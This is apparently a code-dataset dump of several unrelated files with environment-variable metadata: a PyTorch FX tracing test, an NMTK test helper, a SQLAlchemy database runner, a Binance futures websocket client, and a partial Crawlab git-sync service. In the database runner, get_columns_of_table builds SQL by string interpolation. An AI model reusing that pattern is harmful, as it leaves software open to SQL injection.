torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
[] |
[] |
[
"FX_PATCH_GETITEM"
] |
[]
|
["FX_PATCH_GETITEM"]
|
python
| 1 | 0 | |
tests/utils/NMTKTestCase.py
|
#!/usr/bin/env python
# Non-Motorized Toolkit
# Copyright (c) 2014 Open Technology Group Inc. (A North Carolina Corporation)
# Developed under Federal Highway Administration (FHWA) Contracts:
# DTFH61-12-P-00147 and DTFH61-14-P-00108
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the distribution.
# * Neither the name of the Open Technology Group, the name of the
# Federal Highway Administration (FHWA), nor the names of any
# other contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# Open Technology Group Inc BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
import unittest
import os
import simplejson as json
from tests.utils.client import NMTKClient
import logging
import subprocess
import string
import random
logger = logging.getLogger(__name__)
# Get some basic data..
base_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
'../..'))
nmtk_path = os.environ.setdefault('NMTK_PATH', base_path)
class NMTKTestCase(unittest.TestCase):
def _id_generator(self, size=6,
chars=(string.ascii_lowercase +
string.ascii_uppercase +
string.digits)):
return ''.join(random.choice(chars) for x in range(size))
def getUsernamePassword(self):
return (self._id_generator(), self._id_generator())
def _getSiteConfigDynamic(self):
try:
command = ['python',
self.settings_command,
'create_config']
proc = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
config = json.loads(err)
self.delusers.append(config['username'])
# Stderr contains the config output.
return config
except Exception as e:
logger.exception('Failed to get dynamic config!')
return None
def _getSiteConfigStatic(self):
config_file = os.path.join(nmtk_path, 'tests/config.json')
if os.path.exists(config_file):
try:
config = json.loads(open(config_file).read())
return config
except:
pass
return None
def _getSiteConfig(self):
config = self._getSiteConfigDynamic() or self._getSiteConfigStatic()
if config:
return config
raise Exception('No valid config found (tried both dynamic and static')
def setUp(self):
self.settings_command = os.path.join(nmtk_path,
'NMTK_apps/manage.py')
self.delusers = []
config = self._getSiteConfig()
self.support_files = os.path.join(nmtk_path, 'tests/support_files')
self.site_url = config['site_url']
self.username = config['username']
self.password = config['password']
self.client = NMTKClient(self.site_url)
self.client.login(self.username, self.password)
self.api_user_url = self.client.getURL('api', 'user/')
self.api_file_url = self.client.getURL('api', 'datafile/')
def get_support_file(self, fn):
return os.path.join(self.support_files, fn)
def tearDown(self):
'''
Use the management purge_users command to purge the users created
during testing from the database.
'''
if self.delusers:
command = ['python',
self.settings_command,
'purge_users'] + self.delusers
with open(os.devnull, "w") as fnull:
subprocess.call(command, stdout=fnull, stderr=fnull)
def _create_user(self, *args, **kwargs):
'''
A helper method to create a new user, given a password and userid
'''
if len(args) == 2:
kwargs['username'] = args[0]
kwargs['password'] = args[1]
for key in ('username', 'password'):
kwargs.setdefault(key, self._id_generator())
response = self.client.create_user(**kwargs)
self.delusers.append(kwargs['username'])
return response
def _delete_user(self, url):
response = self.client.delete(url)
logger.debug('Deleted %s with status code of %s',
url, response.status_code)
return response
if __name__ == '__main__':
site_url = raw_input('Enter the URL: ').strip()
username = raw_input('Enter the username: ').strip()
password = raw_input('Enter the password: ').strip()
data = {'site_url': site_url,
'username': username,
'password': password}
data2 = json.dumps(data)
open(config_file, 'w').write(data2)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
rtdm_analyze/db.py
|
import os
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Table
from sqlalchemy.orm import registry, relationship, Session
mapper_registry = registry()
Base = mapper_registry.generate_base()
SCHEMA = "RTDM_TECH"
db_url = os.getenv("RTDM_ANALYZER_DB_URL")
campaigns_blocks_data_processes_association_table = Table(
'campaigns_blocks_data_processes_association', mapper_registry.metadata,
Column('campaign_block', Integer, ForeignKey(f'{SCHEMA}.campaigns_blocks.id'), nullable=False),
Column('data_process', Integer, ForeignKey(f'{SCHEMA}.data_processes.id'), nullable=False),
schema=SCHEMA
)
class Campaign(Base):
__tablename__ = "campaigns"
__table_args__ = {"schema": SCHEMA}
id = Column(Integer, primary_key=True, nullable=False)
sas_campaign_id = Column(String, nullable=False)
campaign_name = Column(String)
campaigns_blocks = relationship("CampaignBlock", back_populates="campaign")
def __repr__(self):
return \
f"Campaign(id={self.id!r}, sas_campaign_id={self.sas_campaign_id!r}, campaign_name={self.campaign_name!r})"
class CampaignBlock(Base):
__tablename__ = "campaigns_blocks"
__table_args__ = {"schema": SCHEMA}
id = Column(Integer, primary_key=True, nullable=False)
sas_block_id = Column(String, nullable=False)
block_name = Column(String)
block_type = Column(String)
subdiagram_id = Column(String)
subdiagram_name = Column(String)
campaign_id = Column(Integer, ForeignKey(f'{SCHEMA}.campaigns.id'), nullable=False)
campaign = relationship("Campaign", back_populates="campaigns_blocks")
data_processes = relationship(
"DataProcess", secondary=campaigns_blocks_data_processes_association_table, back_populates='campaigns_blocks'
)
def __repr__(self):
return f"Campaign(id={self.id!r}, sas_block_id={self.sas_block_id!r}, block_name={self.block_name!r})"
class DataProcess(Base):
__tablename__ = "data_processes"
__table_args__ = {"schema": SCHEMA}
id = Column(Integer, primary_key=True, nullable=False)
sas_data_process_id = Column(String, nullable=False)
data_process_name = Column(String)
lib_name = Column(String)
table_name = Column(String)
campaigns_blocks = relationship(
"CampaignBlock", secondary=campaigns_blocks_data_processes_association_table, back_populates="data_processes"
)
def __repr__(self):
return f"Campaign(id={self.id!r}, sas_data_process_id={self.sas_data_process_id!r}, " \
f"data_process_name={self.data_process_name!r})"
class DBRunner:
def __init__(self, connection_string: str = db_url) -> None:
self.connection_string = connection_string
self.engine = create_engine(self.connection_string, future=True)
#mapper_registry.metadata.create_all(self.engine)
def clear_tables(self):
sql = """
delete from RTDM_TECH.campaigns_blocks_data_processes_association;
delete from RTDM_TECH.data_processes;
delete from RTDM_TECH.campaigns_blocks;
delete from RTDM_TECH.campaigns;
"""
session = Session(self.engine)
session.execute(sql)
session.commit()
session.close()
def get_all_data_processes(self):
session = Session(self.engine)
data_processes_list = [data_process.data_process_name for data_process in session.query(DataProcess).all()]
session.close()
return data_processes_list
def insert_data(self, data: dict):
session = Session(self.engine)
campaign_dict = {}
block_dict = {}
for row in data["campaigns"]:
row_instance = Campaign(
sas_campaign_id=row.id,
campaign_name=row.name,
)
session.add(row_instance)
session.flush()
campaign_dict[row_instance.sas_campaign_id] = row_instance.id
for row in data["blocks"]:
row_instance = CampaignBlock(
sas_block_id=row.id,
block_name=row.name,
block_type=row.type,
subdiagram_id=row.subdiagram_id,
subdiagram_name=row.subdiagram_name,
campaign_id=campaign_dict[row.campaign_id],
)
session.add(row_instance)
session.flush()
block_dict[row_instance] = row.data_process_id_list
data_process_list = []
for row in data["data_processes"]:
row_instance = DataProcess(
sas_data_process_id=row.id,
data_process_name=row.name,
lib_name=row.lib_name,
table_name=row.table_name
)
data_process_campaign_block = []
for campaign_block_instance, data_processes_id_list in block_dict.items():
if row_instance.sas_data_process_id in data_processes_id_list:
data_process_campaign_block.append(campaign_block_instance)
row_instance.campaigns_blocks = data_process_campaign_block
data_process_list.append(row_instance)
session.add_all(data_process_list)
session.commit()
session.close()
def get_columns_of_table(self, table_name: str):
sql = F"""
select t.name table_name, c.name column_name
from sys.tables t join sys.columns c on t.object_id = c.object_id
where t.name = '{table_name}';
"""
session = Session(self.engine)
result = session.execute(sql)
return [row[1] for row in result]
def check(self, data_procces_list: list):
table_dict = {}
for data_process in data_procces_list:
db_column_names = self.get_columns_of_table(data_process.table_name)
for d_p_col in data_process.columns:
if d_p_col["name"] not in db_column_names:
table_dict[data_process.name] = (data_process.table_name, d_p_col)
return table_dict
|
[] |
[] |
[
"RTDM_ANALYZER_DB_URL"
] |
[]
|
["RTDM_ANALYZER_DB_URL"]
|
python
| 1 | 0 | |
binance/FuturesWs.go
|
package binance
import (
"encoding/json"
"errors"
"net/http"
"net/url"
"os"
"sort"
"strings"
"time"
"github.com/soulsplit/goex"
"github.com/soulsplit/goex/internal/logger"
)
type FuturesWs struct {
base *BinanceFutures
f *goex.WsConn
d *goex.WsConn
depthCallFn func(depth *goex.Depth)
tickerCallFn func(ticker *goex.FutureTicker)
tradeCalFn func(trade *goex.Trade, contract string)
}
func NewFuturesWs() *FuturesWs {
futuresWs := new(FuturesWs)
wsBuilder := goex.NewWsBuilder().
ProxyUrl(os.Getenv("HTTPS_PROXY")).
ProtoHandleFunc(futuresWs.handle).AutoReconnect()
futuresWs.f = wsBuilder.WsUrl("wss://fstream.binance.com/ws").Build()
futuresWs.d = wsBuilder.WsUrl("wss://dstream.binance.com/ws").Build()
futuresWs.base = NewBinanceFutures(&goex.APIConfig{
HttpClient: &http.Client{
Transport: &http.Transport{
Proxy: func(r *http.Request) (*url.URL, error) {
return url.Parse(os.Getenv("HTTPS_PROXY"))
},
},
Timeout: 10 * time.Second,
},
})
return futuresWs
}
func (s *FuturesWs) DepthCallback(f func(depth *goex.Depth)) {
s.depthCallFn = f
}
func (s *FuturesWs) TickerCallback(f func(ticker *goex.FutureTicker)) {
s.tickerCallFn = f
}
func (s *FuturesWs) TradeCallback(f func(trade *goex.Trade, contract string)) {
s.tradeCalFn = f
}
func (s *FuturesWs) SubscribeDepth(pair goex.CurrencyPair, contractType string) error {
switch contractType {
case goex.SWAP_USDT_CONTRACT:
return s.f.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{pair.AdaptUsdToUsdt().ToLower().ToSymbol("") + "@depth10@100ms"},
Id: 1,
})
default:
sym, _ := s.base.adaptToSymbol(pair.AdaptUsdtToUsd(), contractType)
return s.d.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{strings.ToLower(sym) + "@depth10@100ms"},
Id: 2,
})
}
return errors.New("contract is error")
}
func (s *FuturesWs) SubscribeTicker(pair goex.CurrencyPair, contractType string) error {
switch contractType {
case goex.SWAP_USDT_CONTRACT:
return s.f.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{pair.AdaptUsdToUsdt().ToLower().ToSymbol("") + "@ticker"},
Id: 1,
})
default:
sym, _ := s.base.adaptToSymbol(pair.AdaptUsdtToUsd(), contractType)
return s.d.Subscribe(req{
Method: "SUBSCRIBE",
Params: []string{strings.ToLower(sym) + "@ticker"},
Id: 2,
})
}
return errors.New("contract is error")
}
func (s *FuturesWs) SubscribeTrade(pair goex.CurrencyPair, contractType string) error {
panic("implement me")
}
func (s *FuturesWs) handle(data []byte) error {
var m = make(map[string]interface{}, 4)
err := json.Unmarshal(data, &m)
if err != nil {
return err
}
if e, ok := m["e"].(string); ok && e == "depthUpdate" {
dep := s.depthHandle(m["b"].([]interface{}), m["a"].([]interface{}))
dep.ContractType = m["s"].(string)
symbol, ok := m["ps"].(string)
if ok {
dep.Pair = adaptSymbolToCurrencyPair(symbol)
} else {
dep.Pair = adaptSymbolToCurrencyPair(dep.ContractType) //usdt swap
}
dep.UTime = time.Unix(0, goex.ToInt64(m["T"])*int64(time.Millisecond))
s.depthCallFn(dep)
return nil
}
if e, ok := m["e"].(string); ok && e == "24hrTicker" {
s.tickerCallFn(s.tickerHandle(m))
return nil
}
logger.Warn("unknown ws response:", string(data))
return nil
}
func (s *FuturesWs) depthHandle(bids []interface{}, asks []interface{}) *goex.Depth {
var dep goex.Depth
for _, item := range bids {
bid := item.([]interface{})
dep.BidList = append(dep.BidList,
goex.DepthRecord{
Price: goex.ToFloat64(bid[0]),
Amount: goex.ToFloat64(bid[1]),
})
}
for _, item := range asks {
ask := item.([]interface{})
dep.AskList = append(dep.AskList, goex.DepthRecord{
Price: goex.ToFloat64(ask[0]),
Amount: goex.ToFloat64(ask[1]),
})
}
sort.Sort(sort.Reverse(dep.AskList))
return &dep
}
func (s *FuturesWs) tickerHandle(m map[string]interface{}) *goex.FutureTicker {
var ticker goex.FutureTicker
ticker.Ticker = new(goex.Ticker)
symbol, ok := m["ps"].(string)
if ok {
ticker.Pair = adaptSymbolToCurrencyPair(symbol)
} else {
ticker.Pair = adaptSymbolToCurrencyPair(m["s"].(string)) //usdt swap
}
ticker.ContractType = m["s"].(string)
ticker.Date = goex.ToUint64(m["E"])
ticker.High = goex.ToFloat64(m["h"])
ticker.Low = goex.ToFloat64(m["l"])
ticker.Last = goex.ToFloat64(m["c"])
ticker.Vol = goex.ToFloat64(m["v"])
return &ticker
}
|
[
"\"HTTPS_PROXY\"",
"\"HTTPS_PROXY\""
] |
[] |
[
"HTTPS_PROXY"
] |
[]
|
["HTTPS_PROXY"]
|
go
| 1 | 0 | |
backend/services/git.go
|
package services
import (
"crawlab/lib/cron"
"crawlab/model"
"crawlab/services/spider_handler"
"crawlab/utils"
"fmt"
"github.com/apex/log"
"github.com/globalsign/mgo/bson"
"gopkg.in/src-d/go-git.v4"
"gopkg.in/src-d/go-git.v4/config"
"gopkg.in/src-d/go-git.v4/plumbing"
"gopkg.in/src-d/go-git.v4/plumbing/object"
"gopkg.in/src-d/go-git.v4/plumbing/transport/ssh"
"gopkg.in/src-d/go-git.v4/storage/memory"
"io/ioutil"
"net/url"
"os"
"path"
"regexp"
"runtime/debug"
"strings"
"time"
)
var GitCron *GitCronScheduler
type GitCronScheduler struct {
cron *cron.Cron
}
type GitBranch struct {
Hash string `json:"hash"`
Name string `json:"name"`
Label string `json:"label"`
}
type GitTag struct {
Hash string `json:"hash"`
Name string `json:"name"`
Label string `json:"label"`
}
type GitCommit struct {
Hash string `json:"hash"`
TreeHash string `json:"tree_hash"`
Author string `json:"author"`
Email string `json:"email"`
Message string `json:"message"`
IsHead bool `json:"is_head"`
Ts time.Time `json:"ts"`
Branches []GitBranch `json:"branches"`
RemoteBranches []GitBranch `json:"remote_branches"`
Tags []GitTag `json:"tags"`
}
func (g *GitCronScheduler) Start() error {
c := cron.New(cron.WithSeconds())
// 启动cron服务
g.cron.Start()
// 更新任务列表
if err := g.Update(); err != nil {
log.Errorf("update scheduler error: %s", err.Error())
debug.PrintStack()
return err
}
// 每30秒更新一次任务列表
spec := "*/30 * * * * *"
if _, err := c.AddFunc(spec, UpdateGitCron); err != nil {
log.Errorf("add func update schedulers error: %s", err.Error())
debug.PrintStack()
return err
}
return nil
}
func (g *GitCronScheduler) RemoveAll() {
entries := g.cron.Entries()
for i := 0; i < len(entries); i++ {
g.cron.Remove(entries[i].ID)
}
}
func (g *GitCronScheduler) Update() error {
// 删除所有定时任务
g.RemoveAll()
// 获取开启 Git 自动同步的爬虫
spiders, err := model.GetSpiderAllList(bson.M{"git_auto_sync": true})
if err != nil {
log.Errorf("get spider list error: %s", err.Error())
debug.PrintStack()
return err
}
// 遍历任务列表
for _, s := range spiders {
// 添加到定时任务
if err := g.AddJob(s); err != nil {
log.Errorf("add job error: %s, job: %s, cron: %s", err.Error(), s.Name, s.GitSyncFrequency)
debug.PrintStack()
return err
}
}
return nil
}
func (g *GitCronScheduler) AddJob(s model.Spider) error {
spec := s.GitSyncFrequency
// 添加定时任务
_, err := g.cron.AddFunc(spec, AddGitCronJob(s))
if err != nil {
log.Errorf("add func task error: %s", err.Error())
debug.PrintStack()
return err
}
return nil
}
// 保存爬虫Git同步错误
func SaveSpiderGitSyncError(s model.Spider, errMsg string) {
s, _ = model.GetSpider(s.Id)
s.GitSyncError = errMsg
if err := s.Save(); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return
}
}
// 获得Git分支
func GetGitRemoteBranchesPlain(gitUrl string, username string, password string) (branches []string, err error) {
storage := memory.NewStorage()
var listOptions git.ListOptions
if strings.HasPrefix(gitUrl, "http") {
